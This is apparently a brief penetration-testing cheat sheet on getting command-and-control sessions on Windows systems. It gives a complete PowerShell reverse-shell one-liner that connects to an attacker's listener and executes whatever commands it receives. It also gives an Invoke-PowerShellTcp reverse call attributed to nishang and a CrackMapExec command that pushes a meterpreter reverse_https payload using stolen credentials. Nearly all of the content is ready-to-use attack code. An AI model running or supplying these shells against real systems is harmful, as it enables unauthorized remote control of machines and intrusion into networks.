Techniques to get a command & control session on a Windows system.

Reverse CMD

Find multiple native ways of poping reverse CMD shell

Reverse PowerShell

PowerShell One-Liner
$client = New-Object System.Net.Sockets.TCPClient("",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Invoke-PowerShellTcp -Reverse -IPAddress -Port 1337

Source**: github.com/samratashok/nishang/Shells/Invoke-PowerShellTcp.ps1**


CrackMapExec (metinject)
crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M metinject -o lhost=<LHOST> lport=<LPORT> --server-port <WEB DELIVERY PORT>

Must be used in conjunction with windows/meterpreter/reverse_https payload (reverse_http is also possible with an other module option).